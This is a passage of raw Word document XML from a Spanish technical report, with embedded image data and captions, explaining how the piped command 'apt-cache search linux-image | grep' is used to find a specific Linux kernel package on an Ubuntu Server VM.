                  <v:shape id="Imagen 9" o:spid="_x0000_s1052" type="#_x0000_t75" style="position:absolute;top:159;width:30765;height:27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oqFyQAAAOIAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ra8Iw&#10;FIXfB/6HcAd7m+nCVkc1ihsodS+bzh9waa5NsbkpTaz13y+DwR4P55zvcBar0bVioD40njU8TTMQ&#10;xJU3Ddcajt+bx1cQISIbbD2ThhsFWC0ndwssjL/ynoZDrEWCcChQg42xK6QMlSWHYeo74uSdfO8w&#10;JtnX0vR4TXDXSpVluXTYcFqw2NG7pep8uDgNb+HY2J192e5sPpTl50etTu2X1g/343oOItIY/8N/&#10;7dJoUJlS6lnNcvi9lO6AXP4AAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAA&#10;AAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAV&#10;AQAACwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAzaaKhckAAADi&#10;AAAADwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAP0CAAAA&#10;AA==&#10;">
                    <v:imagedata r:id="rId113" o:title=""/>
                  </v:shape>
                  <v:shape id="Imagen 10" o:spid="_x0000_s1053" type="#_x0000_t75" alt="Texto&#10;&#10;Descripción generada automáticamente" style="position:absolute;left:32043;width:25610;height:10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ffSyAAAAOMAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Pa8Iw&#10;FL8P9h3CG+w20xYcpTOKDETxMJj2sN0ezVtTbV5Kktnu2y+C4PH9/r/FarK9uJAPnWMF+SwDQdw4&#10;3XGroD5uXkoQISJr7B2Tgj8KsFo+Piyw0m7kT7ocYitSCIcKFZgYh0rK0BiyGGZuIE7cj/MWYzp9&#10;K7XHMYXbXhZZ9iotdpwaDA70bqg5H36tgtjsTe+L9uPUbevN9us8zMfpW6nnp2n9BiLSFO/im3un&#10;0/yyKPMiy+c5XH9KAMjlPwAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAA&#10;AAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUB&#10;AAALAAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQDGPffSyAAAAOMA&#10;AAAPAAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA/AIAAAAA&#10;">
                    <v:imagedata r:id="rId114" o:title="Texto&#10;&#10;Descripción generada automáticamente"/>
                  </v:shape>
                </v:group>
                <v:shape id="_x0000_s1054" type="#_x0000_t202" style="position:absolute;left:32176;top:16735;width:23933;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M1kzQAAAOMAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9BT8Mw&#10;DIXvSPyHyEhcEEsHXWFl2TRNIAGXaWUXblHjNd0ap0rSrfx7fEDiaPv5vfctVqPrxBlDbD0pmE4y&#10;EEi1Ny01CvZfb/fPIGLSZHTnCRX8YITV8vpqoUvjL7TDc5UawSYUS63AptSXUsbaotNx4nskvh18&#10;cDrxGBppgr6wuevkQ5YV0umWOMHqHjcW61M1OAXb/Htr74bD6+c6fwwf+2FTHJtKqdubcf0CIuGY&#10;/sV/3++G6+fF03w6nxVMwUy8ALn8BQAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAAT&#10;AAAAAAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/&#10;AAAAFQEAAAsAAAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAOwIzWTN&#10;AAAA4wAAAA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAAB&#10;AwAAAAA=&#10;" stroked="f">
                  <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="00068EC0" w14:textId="046AF922" w:rsidR="00C04AFA" w:rsidRPr="00921489" w:rsidRDefault="00C04AFA" w:rsidP="00C04AFA">
                        <w:pPr>
                          <w:pStyle w:val="Descripcin"/>
                          <w:rPr>
                            <w:rFonts w:cs="Arial"/>
                            <w:noProof/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve">Ilustración </w:t>
                        </w:r>
                        <w:fldSimple w:instr=" SEQ Ilustración \* ARABIC ">
                          <w:r w:rsidR="00117A4E">
                            <w:rPr>
                              <w:noProof/>
                            </w:rPr>
                            <w:t>12</w:t>
                          </w:r>
                        </w:fldSimple>
                        <w:r>
                          <w:t xml:space="preserve">: </w:t>
                        </w:r>
                        <w:bookmarkStart w:id="42" w:name="_Toc155782579"/>
                        <w:r w:rsidRPr="00913473">
                          <w:t xml:space="preserve">Características VM Ubuntu Server y </w:t>
                        </w:r>
                        <w:r w:rsidR="00501A15">
                          <w:t>k</w:t>
                        </w:r>
                        <w:r w:rsidRPr="00913473">
                          <w:t>ernel inicial instalado.</w:t>
                        </w:r>
                        <w:bookmarkEnd w:id="42"/>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:wrap type="square" anchorx="margin"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="009B1250" w:rsidRPr="009B1250">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Este comando realiza dos acciones, por un </w:t>
      </w:r>
      <w:r w:rsidR="0098259F" w:rsidRPr="009B1250">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>lado,</w:t>
      </w:r>
      <w:r w:rsidR="009B1250" w:rsidRPr="009B1250">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009B1250" w:rsidRPr="0098259F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>sudo apt-cache search linux-image</w:t>
      </w:r>
      <w:r w:rsidR="009B1250" w:rsidRPr="009B1250">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, y por otro </w:t>
      </w:r>
      <w:r w:rsidR="009B1250" w:rsidRPr="0098259F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>grep 4.15.0-1021</w:t>
      </w:r>
      <w:r w:rsidR="009B1250" w:rsidRPr="009B1250">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00BD1378">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Con el</w:t>
      </w:r>
      <w:r w:rsidR="009B1250" w:rsidRPr="009B1250">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> "pipe" o "|", </w:t>
      </w:r>
      <w:r w:rsidR="00BD1378">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>pasamos</w:t>
      </w:r>
      <w:r w:rsidR="009B1250" w:rsidRPr="009B1250">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> la respuesta </w:t>
      </w:r>
      <w:r w:rsidR="0098259F" w:rsidRPr="009B1250">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>de la primera acción</w:t>
      </w:r>
      <w:r w:rsidR="009B1250" w:rsidRPr="009B1250">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> como entrada de la segunda acción. Es una parte </w:t>
      </w:r>
      <w:r w:rsidR="00BD1378">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>herramienta</w:t>
      </w:r>
      <w:r w:rsidR="009B1250" w:rsidRPr="009B1250">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> de Unix que permite a los usuarios combinar múltiples comandos sencillos para realizar tareas más complejas. En nuestro caso</w:t>
      </w:r>
      <w:r w:rsidR="00B34A1E">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009B1250" w:rsidRPr="00403D77">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>sudo apt-cache search linux-image</w:t>
      </w:r>
      <w:r w:rsidR="00B34A1E">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E24C918" w14:textId="199B7DEA" w:rsidR="009B1250" w:rsidRPr="009B1250" w:rsidRDefault="002F18FA" w:rsidP="009B1250">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:noProof/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251710464" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2A1AAF16" wp14:editId="53291F42">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-35715</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3445151</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5341035" cy="542925"/>
                <wp:effectExtent l="0" t="0" r="0" b="9525"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="1217618846" name="Grupo 3"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5341035" cy="542925"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5341035" cy="542925"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="452431634" name="Imagen 78"/>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70325" cy="542925"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="1854796031" name="Cuadro de texto 1"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3942130" y="43132"/>
                            <a:ext cx="1398905" cy="415290"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:solidFill>
                            <a:prstClr val="white"/>
                          </a:solidFill>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="356D1757" w14:textId="529B95F8" w:rsidR="00C04AFA" w:rsidRPr="000F4612" w:rsidRDefault="00C04AFA" w:rsidP="00C04AFA">
                              <w:pPr>
                                <w:pStyle w:val="Descripcin"/>
                                <w:rPr>
                                  <w:rFonts w:cs="Arial"/>
                                  <w:noProof/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:t xml:space="preserve">Ilustración </w:t>
                              </w:r>
                              <w:fldSimple w:instr=" SEQ Ilustración \* ARABIC ">
                                <w:r w:rsidR="00117A4E">
                                  <w:rPr>
                                    <w:noProof/>
                                  </w:rPr>
                                  <w:t>13</w:t>
                                </w:r>
                              </w:fldSimple>
                              <w:r>
                                <w:t xml:space="preserve">: </w:t>
                              </w:r>
                              <w:bookmarkStart w:id="43" w:name="_Toc155782580"/>
                              <w:r w:rsidRPr="00BB11F2">
                                <w:t>Buscando Kernel AWS.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1AAF16" id="Grupo 3" o:spid="_x0000_s1055" style="position:absolute;left:0;text-align:left;margin-left:-2.8pt;margin-top:271.25pt;width:420.55pt;height:42.75pt;z-index:251710464" coordsize="53410,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&#10;wl/5ygP07KFDEi7